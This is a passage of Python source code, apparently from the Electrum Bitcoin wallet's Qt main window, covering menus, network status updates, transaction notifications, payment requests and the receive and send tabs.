except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
